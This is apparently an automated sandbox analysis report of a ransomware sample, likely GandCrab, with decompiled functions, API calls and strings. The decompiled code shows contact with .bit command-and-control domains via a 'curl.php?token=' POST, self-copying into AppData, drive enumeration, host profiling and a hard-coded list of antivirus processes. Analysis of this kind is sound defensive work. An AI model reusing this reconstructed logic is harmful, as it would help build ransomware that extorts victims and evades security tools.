Part of subcall function 00404EB0: wsprintfW.USER32 ref: 00404FA7
Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8

lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 00405395
VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 004053B5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 004053CA
lstrcatA.KERNEL32(00000000,data=), ref: 004053E8
lstrcatA.KERNEL32(00000000,004056FE), ref: 004053EE
lstrlenA.KERNEL32(00000000), ref: 00405442
_memset.LIBCMT ref: 0040545D
lstrcpyW.KERNEL32 ref: 00405471
lstrlenW.KERNEL32(?), ref: 00405489
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 004054A9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00405506
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00405512
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0040551E
InternetCloseHandle.WININET(?), ref: 00405528

Strings

POST, xrefs: 0040549A
data=, xrefs: 004053E2
curl.php?token=, xrefs: 0040546B

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
Instruction ID: 4aa36092560c0acaf7b062926e9d70cdf9a0aa4eca25d73af60562301bb62425
Opcode Fuzzy Hash: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
Instruction Fuzzy Hash: 54519671E0031A66DB109BA5DD45FEEBB7CFB48300F104176FA44B6191DB786A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E00407BA0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E00407C60( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E00407BA0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E00402890(_v28, _t50); // executed
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E00402960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x00402ad6
0x00402aea
0x00402af0
0x00402af4
0x00402af6
0x00402b00
0x00402b1c
0x00402b1e
0x00402b1e
0x00402b02
0x00402b02
0x00402b02
0x00402b08
0x00402b10
0x00402b12
0x00402b14
0x00402b14
0x00402b28
0x00402b2c
0x00402b38
0x00402b3e
0x00402b43
0x00402b48
0x00402b4a
0x00402b55
0x00402b62
0x00402b67
0x00402b6c
0x00402b75
0x00402b89
0x00402b8e
0x00402b9c
0x00402ba2
0x00402ba5
0x00402ba7
0x00402bac
0x00402bae
0x00402be4
0x00402bec
0x00402bf4
0x00402bf6
0x00402bfd
0x00402c02
0x00402c05
0x00402c07
0x00000000
0x00000000
0x00402c0f
0x00402c11
0x00402c16
0x00402c1d
0x00402c2c
0x00402c2c
0x00402c2c
0x00402c2e
0x00402c2e
0x00402c2f
0x00402c35
0x00402c3b
0x00000000
0x00402c3d
0x00402c25
0x00402c2a
0x00000000
0x00000000
0x00000000
0x00402c2a
0x00402bb6
0x00402bb8
0x00402bbd
0x00402bc4
0x00402bd3
0x00402bd3
0x00402bd3
0x00402bd5
0x00402bd5
0x00000000
0x00402bd5
0x00402bcc
0x00402bd1
0x00000000
0x00000000
0x00000000
0x00402b4c
0x00402b4c
0x00402c40
0x00402c40
0x00402c45
0x00402c47
0x00402c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 00402B7D

Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
Part of subcall function 00407C60: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407D73

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00402B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00402BE4
lstrcatW.KERNEL32(00000000,?), ref: 00402BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 00402BF4
wsprintfW.USER32 ref: 00402C35
ExitThread.KERNEL32 ref: 00402C47

Strings

P, xrefs: 00402B55
\Microsoft\, xrefs: 00402BDE
U, xrefs: 00402B75
I, xrefs: 00402B6C
AppData, xrefs: 00402B97
"%s", xrefs: 00402C2F
.exe, xrefs: 00402BEE

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 9e747ac548fade67ca80e3a5a1c7d914f0df0461fe01838a22cb7d582e208898
Instruction ID: 1f7025583fece4150ab6efb2fb4095bab450847bdb3333ccf3c22af7b910d208
Opcode Fuzzy Hash: 9e747ac548fade67ca80e3a5a1c7d914f0df0461fe01838a22cb7d582e208898
Instruction Fuzzy Hash: 0841A771204311ABE304EF219E4DB5F77A8AF84704F04443EB555B62D2DBB8A908CBAF

Uniqueness

Uniqueness Score: -1.00%

Function 00407369 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 123
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00407369(signed int __eax, intOrPtr __edx, void* __esi) {
				signed int _t51;
				signed int _t54;
				signed int _t56;
				void* _t58;
				long _t59;
				int _t72;
				void* _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr _t85;
				WCHAR* _t88;
				intOrPtr _t93;
				signed int _t95;
				intOrPtr _t100;
				void* _t102;
				void* _t104;
				void* _t106;

				_t102 = __esi;
				_t93 = __edx;
				_t51 = __eax;
				do {
					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
					_t54 = GetDriveTypeW(_t104 - 0x24); // executed
					_t95 = _t54;
					if(_t95 <= 2 || _t95 == 5) {
						L6:
					} else {
						 *((short*)(_t104 - 0x20)) = 0;
						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
						 *((short*)(_t104 - 0x20)) = 0x5c;
						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
						lstrcatW( *(_t102 + 0x7c), "_");
						_t72 = GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10); // executed
						if(_t72 == 0) {
							lstrcatW( *(_t102 + 0x7c), L"0,");
							goto L6;
						} else {
							 *((intOrPtr*)(_t104 - 8)) = E00408470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t85 = _t93;
							_t75 = E00408470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t100 =  *((intOrPtr*)(_t104 - 8));
							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t104 - 8)) = _t85;
							_t77 = lstrlenW( *(_t102 + 0x7c));
							_push(_t85);
							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
							_t80 = lstrlenW( *(_t102 + 0x7c));
							_push( *((intOrPtr*)(_t104 - 8)));
							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
							_t106 = _t106 + 0x20;
							lstrcatW( *(_t102 + 0x7c), ",");
						}
					}
					_t51 =  *(_t104 - 0x18) + 1;
					 *(_t104 - 0x18) = _t51;
				} while (_t51 < 0x1b);
				_t56 = lstrlenW( *(_t102 + 0x7c));
				_t88 =  *(_t102 + 0x7c);
				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
				if( *(_t102 + 0x80) != 0) {
					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
					 *(_t102 + 0x84) = _t58;
					if(_t58 == 0) {
						L13:
						 *(_t102 + 0x80) = 0;
					} else {
						_push(_t88);
						_t59 = E004068F0(_t58); // executed
						if(_t59 == 0) {
							VirtualFree( *(_t102 + 0x84), _t59, 0x8000); // executed
							goto L13;
						}
					}
				}
				return 1;
			}

0x00407369
0x00407369
0x00407369
0x00407370
0x00407375
0x0040737d
0x00407383
0x00407388
0x0040747b
0x00407397
0x00407399
0x004073a4
0x004073b2
0x004073b6
0x004073c0
0x004073d6
0x004073de
0x00407479
0x00000000
0x004073e4
0x00407400
0x00407403
0x00407405
0x0040740a
0x00407416
0x00407419
0x0040741b
0x0040741e
0x00407427
0x00407438
0x00407446
0x00407448
0x0040745a
0x00407462
0x0040746d
0x0040746d
0x004073de
0x00407484
0x00407485
0x00407488
0x00407494
0x00407496
0x0040749b
0x004074a7
0x004074b7
0x004074bd
0x004074c5
0x004074e4
0x004074e4
0x004074c7
0x004074c7
0x004074c9
0x004074d0
0x004074de
0x00000000
0x004074de
0x004074d0
0x004074c5
0x004074f9

APIs

GetDriveTypeW.KERNEL32(?), ref: 0040737D
lstrcatW.KERNEL32(?,?), ref: 004073A4
lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00404590,00000000,?,00000000), ref: 0040741E
wsprintfW.USER32 ref: 00407438
lstrlenW.KERNEL32(?), ref: 00407446
wsprintfW.USER32 ref: 0040745A
lstrcatW.KERNEL32(?,004107D0), ref: 0040746D
lstrcatW.KERNEL32(?,004107D4), ref: 00407479
lstrlenW.KERNEL32(?), ref: 00407494
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 004074B7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 004074DE

Strings

%I64u/, xrefs: 00407432
%I64u, xrefs: 00407451

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
String ID: %I64u$%I64u/
API String ID: 1496313530-2450085969
Opcode ID: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
Instruction ID: f56a49131db2d010194e37aaef5b9fe43e36d368a28beff8943d66c84b1e197f
Opcode Fuzzy Hash: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
Instruction Fuzzy Hash: A4418371A00608AFDB219BA4CD45FAEBBF9FF48300F10442AE655F32A1DA35F950CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 84
memorystringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00404EB0() {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v72;
				WCHAR* _t26;
				void* _t31;
				long _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t41;
				void* _t46;
				signed int _t50;
				void* _t52;

				asm("movdqa xmm0, [0x410960]");
				_v20 =  &_v72;
				_v16 =  &_v36;
				_v36 = 0x69736d65;
				_v32 = 0x74666f73;
				_v28 = 0x7469622e;
				_v24 = 0;
				asm("movdqu [ebp-0x44], xmm0");
				_v56 = 0;
				_v52 = 0x646e6167;
				_v48 = 0x62617263;
				_v44 = 0x7469622e;
				_v40 = 0;
				_v12 =  &_v52;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4); // executed
				_t38 = _t26;
				if(_t38 != 0) {
					_t40 = 0;
					_t50 = 0;
					while(1) {
						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
						_t50 =  ==  ? 0 : _t50 + 1;
						if(_t40 == 0xffffffff) {
							Sleep(0x2710); // executed
						}
						_t31 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4); // executed
						_t46 = _t31;
						_t41 = _t46; // executed
						E00404D60(_t41, _v8); // executed
						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
						if(_t33 != 0) {
							break;
						}
						VirtualFree(_t46, _t33, 0x8000); // executed
						_t40 = _t41 | 0xffffffff;
					}
					wsprintfW(_t38, L"%S", _t46);
					VirtualFree(_t46, 0, 0x8000);
					_t26 = _t38;
				}
				return _t26;
			}

0x00404eb6
0x00404ecc
0x00404ed7
0x00404ee4
0x00404eeb
0x00404ef2
0x00404ef9
0x00404efd
0x00404f02
0x00404f06
0x00404f0d
0x00404f14
0x00404f1b
0x00404f1f
0x00404f22
0x00404f24
0x00404f28
0x00404f2e
0x00404f30
0x00404f32
0x00404f37
0x00404f3f
0x00404f45
0x00404f4c
0x00404f4c
0x00404f6a
0x00404f6f
0x00404f71
0x00404f73
0x00404f7e
0x00404f86
0x00000000
0x00000000
0x00404f8f
0x00404f9b
0x00404f9b
0x00404fa7
0x00404fb8
0x00404fbe
0x00404fbe
0x00404fc6

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
Sleep.KERNEL32(00002710), ref: 00404F4C
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404F8F
wsprintfW.USER32 ref: 00404FA7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8

Strings

.bit, xrefs: 00404F14
.bit, xrefs: 00404EF2
soft, xrefs: 00404EEB
emsi, xrefs: 00404EE4
gand, xrefs: 00404F06
fabian wosar <3, xrefs: 00404F78
crab, xrefs: 00404F0D

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
API String ID: 2709691373-1090818981
Opcode ID: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
Instruction ID: 12e809f3953ca4ef3e333bd49a631b39bc1f07fb3bc4506d08caa0eda9158355
Opcode Fuzzy Hash: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
Instruction Fuzzy Hash: 34317AB1A04319ABDB11DFA4AD45BAEBBB8FB84710F10013AF701B72D1D7B45905CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407520 Relevance: 25.6, APIs: 17, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00407520(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0040753d
0x0040753f
0x0040754d
0x0040754f
0x00407556
0x0040755d
0x00407564
0x0040756b
0x00407572
0x00407579
0x00407580
0x00407587
0x0040758e
0x00407595
0x0040759c
0x004075a3
0x004075aa
0x004075b1
0x004075b3
0x004075b5
0x004075ba
0x004075e4
0x004075ea
0x004075bc
0x004075c0
0x004075c6
0x004075cc
0x004075d2
0x004075ef
0x004075f1
0x004075f3
0x004075f6
0x004075f9
0x004075fc
0x004075ff
0x00407607
0x00000000
0x00407610
0x00407618
0x00407620
0x0040762f
0x00407633
0x00000000
0x00407635
0x00407635
0x00407635
0x00407697
0x00407697
0x0040769e
0x004076a6
0x00000000
0x00000000
0x00000000
0x004076a6
0x0040763e
0x0040763f
0x00407641
0x00407648
0x00407665
0x0040766e
0x0040764a
0x0040764a
0x00407657
0x00407657
0x00407670
0x0040768e
0x00407691
0x00407694
0x00000000
0x00407694
0x004076b7
0x004076bb
0x004076bd
0x004076c3
0x004076d0
0x004076d0
0x004076c3
0x004076db
0x004076db
0x004076eb
0x004076f0
0x004076f6
0x004076fb
0x00407705
0x00407705
0x0040770f
0x004075d4
0x004075dc
0x00000000
0x004075dc
0x004075d2

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0040753D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 004075B1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004075C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004075DC
Process32FirstW.KERNEL32(00000000,00000000), ref: 004075FF
lstrcmpiW.KERNEL32(004107DC,-00000024), ref: 00407625
Process32NextW.KERNEL32(?,?), ref: 0040769E
GetLastError.KERNEL32 ref: 004076A8
lstrlenW.KERNEL32(00000000), ref: 004076C6
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004076EB
FindCloseChangeNotification.KERNEL32(?), ref: 004076F0
VirtualFree.KERNELBASE(?,?,00008000), ref: 00407705

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID:
API String ID: 1411803383-0
Opcode ID: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
Instruction ID: 1c74ff85e4bbe89c11da167877251bfadadfb1b789393fb2674ad8a1102b1764
Opcode Fuzzy Hash: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
Instruction Fuzzy Hash: DF514D71E04218ABDB109F98DD48B9E7BB4FF85720F20806AE505BB290C7B56D85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404550 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.KERNEL32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
